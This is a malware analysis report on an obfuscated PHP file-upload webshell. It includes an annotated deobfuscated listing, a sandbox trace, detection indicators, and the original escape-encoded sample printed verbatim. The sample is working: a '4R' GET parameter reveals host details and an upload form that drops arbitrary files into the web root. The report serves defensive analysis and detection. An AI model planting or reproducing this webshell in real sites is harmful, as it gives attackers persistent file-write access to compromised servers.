PHP Malware Analysis

obefus.php

md5: dee3a8f432025dc2ade9f83ac9877c49


Deobfuscated PHP code (the escape-sequence-encoded strings of the original listing below decoded to plain text; annotated for analysis)

<?php

// NOTE(review): this is a malware sample (a minimal file-upload webshell) reproduced
// for analysis. The comments describe observed behaviour only; the code is unchanged.

// Activation token. The shell only reveals itself when a GET parameter named "4R"
// is present; the value of the parameter is never checked, only its presence.
// Indicators for detection: GET key "4R", POST field "upload", multipart file field "idx_file".
$waf = "4R";
if (isset($_GET["4R"])) {
    // Operator banner (Indonesian: "hello 4R!, where have you been, dear ...").
    // htmlspecialchars() is applied to a hard-coded constant here, so it is cosmetic.
    echo "haloo " . htmlspecialchars($waf) . "!, kemana aja kamu sayang wkwkawoawkoa";
    echo "<br />";
    // Host fingerprint: discloses the php_uname() string (OS, kernel, hostname, arch).
    echo "<b>" . php_uname() . "</b><br>";
    // Self-contained multipart upload form that posts back to this same URL.
    echo "<form method='post' enctype='multipart/form-data'>\n\t  <input type='file' name='idx_file'>\n\t  <input type='submit' name='upload' value='upload'>\n\t  </form>";
    $root = $_SERVER["DOCUMENT_ROOT"];
    // The destination filename is the attacker-supplied name from the multipart body,
    // used verbatim: no basename(), no extension or MIME check, no size limit. A crafted
    // request can therefore choose any name, including ../ segments, so the drop
    // location is not confined to the web root.
    $files = $_FILES["idx_file"]["name"];
    $dest = $root . "/" . $files;
    if (isset($_POST["upload"])) {
        if (is_writable($root)) {
            // Primary drop: copy the uploaded temp file straight into the web root.
            // The '@' suppresses copy() warnings, so a failed write leaves no PHP log noise.
            if (@copy($_FILES["idx_file"]["tmp_name"], $dest)) {
                // Link to the dropped file, built from the unescaped client-supplied
                // Host header; shown only to the operator.
                $web = "http://" . $_SERVER["HTTP_HOST"] . "/";
                echo "Sukses Upload -> <a href='{$web}{$files}' target='_blank'><b><u>{$web}{$files}</u></b></a>";
            } else {
                echo "Gagal Upload."; // "Upload failed."
            }
        } else {
            // Fallback drop when the web root is not writable: the bare filename is a
            // relative path, so the file lands in the PHP process's current working
            // directory (typically the directory containing this script).
            if (@copy($_FILES["idx_file"]["tmp_name"], $files)) {
                echo "Sukses Upload <b>{$files}</b> di Folder ini"; // "Uploaded ... in this folder"
            } else {
                echo "Gagal Upload"; // "Upload failed"
            }
        }
    }
} else {
    // No trigger: print a taunt ("what do you want, <first GET key>?") and nothing else.
    // The key is HTML-escaped before output. With an empty query string
    // array_keys($_GET)[0] is null, which the execution trace below shows being
    // passed to htmlspecialchars() and coming back as '' (a deprecation notice on PHP 8.1+).
    echo "MAU NGAPAIN LO " . htmlspecialchars(array_keys($_GET)[0]) . " ? >:(";
}

Execution traces (sandbox run with no query string: array_keys() is called on an empty $_GET, so only the untriggered else branch executed and the upload path was never exercised)

data/traces/dee3a8f432025dc2ade9f83ac9877c49_trace-1676244838.9808.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:34:24.878592]
1	0	1	0.000187	393528
1	3	0	0.000294	401736	{main}	1		/var/www/html/uploads/obefus.php	0	0
1		A						/var/www/html/uploads/obefus.php	2	$waf = '4R'
2	4	0	0.000327	401736	array_keys	0		/var/www/html/uploads/obefus.php	2	1	[]
2	4	1	0.000342	401768
2	4	R			[]
2	5	0	0.000375	401736	htmlspecialchars	0		/var/www/html/uploads/obefus.php	2	1	NULL
2	5	1	0.000391	401928
2	5	R			''
1	3	1	0.000405	401736
			0.000431	314304
TRACE END   [2023-02-12 21:34:24.878874]


Generated HTML code (output of the trace above: the taunt message from the else branch, with the first GET key rendered as an empty string)

<html><head></head><body>MAU NGAPAIN LO  ? &gt;:(</body></html>

Original PHP code (the obfuscated sample exactly as found, matching the md5 above: every string literal is written with mixed octal/hex escape sequences; listed verbatim and intentionally left unedited)

<?php
 $waf = "\64\x52"; if (isset($_GET["{$waf}"])) { echo "\x68\141\154\157\x6f\x20" . htmlspecialchars($waf) . "\41\x2c\40\x6b\145\155\x61\156\141\x20\x61\152\x61\40\153\141\x6d\165\40\x73\x61\x79\x61\156\x67\40\167\153\167\x6b\x61\167\157\141\x77\x6b\157\x61"; echo "\x3c\142\162\40\x2f\x3e"; echo "\x3c\142\76" . php_uname() . "\74\x2f\142\x3e\74\x62\x72\76"; echo "\74\146\x6f\x72\x6d\40\155\x65\164\x68\157\x64\75\47\x70\157\163\x74\47\40\x65\156\x63\164\x79\x70\x65\75\x27\155\x75\x6c\x74\151\160\141\x72\164\57\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x27\x3e\xa\11\40\40\74\x69\156\x70\x75\x74\x20\x74\171\160\x65\75\x27\x66\151\154\145\x27\x20\156\x61\155\145\75\47\x69\144\x78\137\x66\151\154\x65\x27\76\xa\11\x20\40\x3c\x69\156\160\x75\x74\x20\x74\x79\160\x65\75\47\163\x75\142\155\x69\164\x27\40\x6e\x61\155\145\x3d\x27\165\160\154\x6f\x61\144\47\40\166\141\154\165\x65\x3d\47\x75\x70\154\x6f\x61\144\47\x3e\12\x9\x20\x20\74\x2f\x66\x6f\162\x6d\x3e"; $root = $_SERVER["\x44\117\103\125\115\105\116\124\x5f\x52\x4f\x4f\124"]; $files = $_FILES["\x69\x64\170\137\146\x69\x6c\x65"]["\x6e\141\x6d\x65"]; $dest = $root . "\x2f" . $files; if (isset($_POST["\165\x70\154\x6f\141\144"])) { if (is_writable($root)) { if (@copy($_FILES["\151\144\x78\x5f\146\151\x6c\x65"]["\164\x6d\x70\137\156\x61\x6d\145"], $dest)) { $web = "\150\x74\x74\x70\72\x2f\57" . $_SERVER["\110\x54\124\120\137\x48\117\x53\x54"] . 
"\57"; echo "\123\x75\153\163\145\163\x20\125\160\154\157\x61\x64\x20\x2d\76\x20\x3c\141\x20\150\162\x65\x66\75\47{$web}{$files}\47\x20\x74\x61\162\147\x65\164\x3d\x27\x5f\x62\x6c\141\x6e\153\47\x3e\x3c\142\76\74\165\x3e{$web}{$files}\74\x2f\x75\x3e\74\57\x62\x3e\74\x2f\141\x3e"; } else { echo "\x47\x61\147\x61\x6c\x20\125\x70\154\157\x61\144\x2e"; } } else { if (@copy($_FILES["\151\144\x78\137\x66\151\x6c\145"]["\164\155\160\137\156\141\155\145"], $files)) { echo "\123\165\x6b\x73\145\x73\40\x55\160\154\157\141\x64\40\x3c\x62\x3e{$files}\74\x2f\142\76\x20\144\151\x20\106\157\x6c\144\x65\x72\x20\151\156\x69"; } else { echo "\107\x61\147\x61\154\40\125\x70\x6c\157\141\x64"; } } } } else { echo "\x4d\101\x55\x20\116\107\x41\x50\x41\111\116\x20\114\x4f\40" . htmlspecialchars(array_keys($_GET)[0]) . "\x20\77\x20\76\x3a\50"; }